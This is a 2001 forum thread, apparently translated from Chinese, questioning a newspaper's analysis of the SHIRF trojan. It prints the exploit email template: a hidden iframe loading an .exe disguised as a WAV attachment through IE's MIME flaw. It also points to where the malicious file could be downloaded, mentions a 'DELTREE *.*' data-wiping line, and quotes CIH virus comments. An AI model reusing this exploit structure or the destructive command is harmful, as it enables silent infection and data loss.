Questions about the SHIRF trojan

sjy 2001-08-05 05:41:06
I used to be rather ill-informed and assumed that simply browsing the web could not get you a trojan or a virus. A couple of days ago a colleague mentioned that just browsing can get you a trojan; I didn't believe him. Today I read China Computer Newspaper (电脑报); its network security section had an article, "Malicious Code and Network Security: Trojans", analysing a trojan that can spread just by being browsed: www.shirf.(this should be 51.)net. If you are using IE5 with security set to Medium (nothing to do with ActiveX), it can spread, using the MIME vulnerability. The article was quite detailed; I couldn't help believing it. Still, I have always been a skeptic. Following the newspaper's instructions I downloaded its WINCFG.EML and compared it, and there are indeed suspicious parts.
Supposedly, once you are infected there will be a WINCFG.exe in the registry's Run key (it is the code below, BASE64-encoded, exploiting the Windows MIME vulnerability),

I haven't tried it, but I believe this thing is dangerous; at the very least, adding a line DELTREE *.* to AUTOEXEC.BAT would work (BUT IT IS SAID THAT THIS HORSE JUST DOES SOME OICQ INFO AND FILE TRANSFER FUNCTIONS...). I'm timid; would someone braver please verify it.

You can download the source from (http://shirf.(this should be 51.)net/wincfg.eml) using NetAnts, or if you want the details you can buy the 2001.7.30 issue of CPCW.

From: "xxx" <xxxx@xxx.xxx>
To: "xxx" <xxxx@xxx.xxx>
Subject: xxxx
Date: Tue, 7 Apr 2001 15:16:57 +800
MIME-Version: 1.0
Content-Type: multipart/related;
    type="multipart/alternative";
    boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--1
Content-Type: multipart/alternative;
    boundary="2"


--2
Content-Type: text/html;
    charset="gb2312"
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
<BR>
</BODY>
</HTML>

--2--

--1
Content-Type: audio/x-wav;
    name="wincfg.exe"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>
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==

--1--

This "trojan" is only 6K. I think 6K is on the large side for a virus, as witnessed by the comments Xiao Chen wrote when he made CIH back then:
; *==========================================================================*
; * v1.3 1. modify the bug that winzip self-extractor occurs error. *
; * so when open winzip self-extractor ==> don't infect it. *
; * 05/24/1998 2. the virus "basic" size is 1010 bytes. *
; *==========================================================================*
; * v1.4 1. full modify the bug : winzip self-extractor occurs error. *
; * 2. change the date of killing computers. *
; * 05/31/1998 3. modify virus version copyright. *
; * 4. the virus "basic" size is 1019 bytes. *
; ****************************************************************************
But for a trojan it seems unable to do much. When I read the BO2000 source, merely implementing the TCP/IP connection between server and client took several hundred lines, and the compiled result was as big as an application. So I have some doubts about this trojan's FTP and OICQ capabilities.
However, if this trojan can get an EXE to run on your computer, it could also spread viruses like CIH, yet I have never heard anyone warn about this before; if it were true, it surely wouldn't be left to me to discover it. So that is what I find doubtful about this. Still, I don't want this kind of thing to exist on the Internet; it would spoil the fun of going online.

Lastly, does anyone know a trustworthy place to download firewalls and the like? Please recommend one. Though I think a PC firewall can guard against trojans, guarding against the newest viruses is probably hard.
2 replies
alphapaopao 2001-08-05
That's an IE bug: IE doesn't properly distinguish multimedia data from executable code, it just calls WinExec(), heh, and then you're toast.

ssh_zy 2001-08-05
I also read China Computer Newspaper and downloaded it too; nothing happened, and deleting it was the end of it.
(Though you may well have already run it by accident.)